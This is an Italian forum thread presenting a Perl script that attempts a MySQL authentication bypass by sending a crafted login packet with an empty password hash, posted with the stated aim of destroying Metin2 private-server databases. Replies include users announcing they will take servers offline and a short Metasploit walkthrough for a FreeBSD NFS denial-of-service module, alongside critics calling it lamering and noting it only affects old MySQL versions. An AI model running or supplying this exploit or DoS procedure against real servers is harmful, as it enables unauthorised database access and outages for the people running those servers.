Unmantained Guida MYSQL BYPASSING EXPLOITS SOURCE - DESTROYING METIN'S DB!!##§§§§

Una guida contrassegnata come Unmantained contiene informazioni su un argomento obsoleto, non più utile o files non aggiornati da parte del creatore.
Stato
Discussione chiusa ad ulteriori risposte.

Girolamo Bahamiano

Utente Silver
25 Aprile 2011
17
6
5
57
Ultima modifica da un moderatore:
!!!!!!!######!!!!!!!!
3306 Bug MySQL port

PHP:
#!/usr/bin/perl
use strict;
use IO::Socket::INET;

usage() unless ((@ARGV >= 1) || (@ARGV <= 3));

my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
  usage();
}
my $port = shift(@ARGV);
if (!$port)
{
 $port = 3306; print "Sto usando la porta di default del mysql (3306)\n";
}

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Impossibile connettersi all'host\n";

# receive greeting
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
{
 print "Nessuna connsione al mysql!\n";
 exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";

# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";

# break the username string into chars and rebuild it
my $binuser = pack("C*", unpack("C*", $username));

# send login caps packet with password
my $packet = "\x85\xa6".
             "\x03\x00\x00".
    "\x00".
    "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
             "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash

substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)

print "Sto mandando i caps packet:\n";
HexDump($packet);
print "\n";
send $socket, $packet, 0;

# receive reply
recv($socket, $reply, 1024, 0);
print "Risposta:\n";
HexDump($reply);

my @list_bytes = unpack("C*", $reply);

#print "The fifth byte is: ", $list_bytes[4], "\n";
if (scalar @list_bytes <= 4)
{
 print "Response insufficenti\n";
}

#if ($reply eq $login_ok)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
 print "Bypassing Mysql effettuato!!\n";
}
else
{
 print "Fail! Bypass denied!\n";
}

# close
close($socket);


sub usage
{
    # print usage information
    print "\nusalo: 3306.pl <username> <host> [port]\n
<username> - DB username 
<host> - host 
[port] - la porta tcp (3306)\n\n";
    exit(1);
}


sub HexDump
{
 my $buffer = $_[0];

 # unpack it into chars
 my @up = unpack("C*", $buffer);
 my $pos=0;

 # calculate matrix sizes
 my $rows = int(@up/16);
 my $leftover = int(@up%16);

 for( my $row=0; $row < $rows ; $row++, $pos+=16)
 {
  printf("%08X\t", $pos);
  my @values = @up[$pos .. $pos+15];
  my @line;
  foreach my $val (@values)
  {
   push(@line, sprintf("%02X", $val));
  }
  print join(' ', @line), "\n";
 }
 # print last line
 printf("%08X\t", $pos);
 my @values = @up[$pos .. $pos+$leftover-1];
 my @line;
 foreach my $val (@values)
 {
  push(@line, sprintf("%02X", $val));
 }
 print join(' ', @line), "\n";
}
 
Mettilo in [php ] [/ php] (Senza i spazi
PHP:
Esattamente Così *-*
)

Altrimenti i : \ si vedono :\ .

Del resto ottimo lavoro.. ci saranno molti server in meno :).
 
Ultima modifica:
Thanks for your sharing :D

EDIT : concordo djluis .. io sto già iniziando v.v
il tempo ke finisce di scaricare strawberry-perl e ti trovi la metà dei server off :D
mi stavo annoiando! x fortuna so già da ki iniziare ahahahahahahah
imperia il "*termine volgare censurato*" :D
 
Inutile postare cose alla cavolo e solo per fare scena: questo exploit funziona solo sui server mysql fino alla versione 4.1.2 e sulla versione 5.0. Credo che nessuno dei server di metin abbia una versione di mysql così poco recente installata, sarebbe da sprovveduti (da notare poi che le guide dicono sempre di installare la versione 5.1).
 
Thanks for your sharing :D

EDIT : concordo djluis .. io sto già iniziando v.v
il tempo ke finisce di scaricare strawberry-perl e ti trovi la metà dei server off :D
mi stavo annoiando! x fortuna so già da ki iniziare ahahahahahahah
imperia il "*termine volgare censurato*" :D
ma quanto fai ridere da 1 a 100?
 
vedremo... anke se fosse... Google
Non ti posso definire che lamer, perchè scriptkiddie sarebbe un complimento, per te. Se cercare "xxxxx exploit" su google per te è uguale a hackerare o ad essere esperto con gli exploit, concordo con slash, sei ridicolo. Non sapete neanche qual è la differenza tra un exploit remoto e locale...
 
aggiornamento: per chi usa metasploit stavo proprio guardando ora un attacco di tipo dos: (mini guida all'uso dell'exploit)
use auxiliary/dos/freebsd/nfsd/nfsd_mount
show options
RHOST: host della vittima
RPORT: mettete 2049
run (oppure exploit)
 
aggiornamento: per chi usa metasploit stavo proprio guardando ora un attacco di tipo dos: (mini guida all'uso dell'exploit)
use auxiliary/dos/freebsd/nfsd/nfsd_mount
show options
RHOST: host della vittima
RPORT: mettete 2049
run (oppure exploit)
nfs = network file system, disabilitato di default sui sistemi freebsd, e dubito che la gente sappia cos'è o che lo usi per un qualche scopo concreto. Stai solo facendo figure non proprio "belle", non so quanto ti convenga continuare a fingere di essere un esperto nell'hacking mentre in realtà continui solo a sguazzare nel fango.
 
quell'exploit è piu vecchio di me =/

quoto pieno con ricky92 oltretutto robetta (exploit) che rubano i dati imbrogliando root ce ne sono migliaia (anche se questo fa cose diverse) comunque
basta poco per avere un po di sicurezza... una versione di mysql nuova[testata senza bug], cambiare sempre la password, cambiare l'id root.
 
Tu dovresti EDITARLE queste tipo release!
Come hanno fatto i tuoi colleghi in passato con altre discussioni del genere! Ivece di dire : messo io =)...

Bel moderatore... complimenti!

Beh, perchè? Questo è una community, si parla e si discute anche di queste cose inerenti a Metin2 private server.
Non c'è niente di sbagliato.
 
Fin a prova contraria ha postato un'exploit, non come utilizzarlo :)..

Io per esempio lo sto studiando, sono un pò appassionato di queste cose :)..

Quindi prima di criticare il moderatore, giratevi i pollici e pensate 10 secondi in più :)..
 
Fin a prova contraria ha postato un'exploit, non come utilizzarlo :)..

Io per esempio lo sto studiando, sono un pò appassionato di queste cose :)..

Quindi prima di criticare il moderatore, giratevi i pollici e pensate 10 secondi in più :)..
Quel che hai appena detto è come dire "Vi do una bomba atomica e le istruzioni, ma non vi dico come usarla, quindi posso darvela"
Nonsense totale. .____.
 
Beh, perchè? Questo è una community, si parla e si discute anche di queste cose inerenti a Metin2 private server.
Non c'è niente di sbagliato.

Appunto era nato a scopo di studio, e non a scopo di distruggere il lavoro che hanno fatto i proprietari dei retro server.

ed è qui che sbagli, si tratta di hack e cheat non di lamering.

Appunto, ma questo è lamering... e poi molti non sanno che bucare i server anche per quanto possano tenere dentro cose illegali, e illegale al tempo stesso, se non di più!

Fin a prova contraria ha postato un'exploit, non come utilizzarlo :)..

Io per esempio lo sto studiando, sono un pò appassionato di queste cose :)..

Quindi prima di criticare il moderatore, giratevi i pollici e pensate 10 secondi in più :)..

Ma tu ivece di criticare me, evita... perchè guarda che la cosa potrebbe girarsi anche contro di te... E pensa a fare i compiti anzicchè, di studiare come fottere il prossimo.
 
Fin a prova contraria ha postato un'exploit, non come utilizzarlo :)..

Io per esempio lo sto studiando, sono un pò appassionato di queste cose :)..

Quindi prima di criticare il moderatore, giratevi i pollici e pensate 10 secondi in più :)..
prima di scrivere queste cose ci devi pensare e girarti i pollici pure tu .-.
 
Stato
Discussione chiusa ad ulteriori risposte.
Indietro
Top Bottom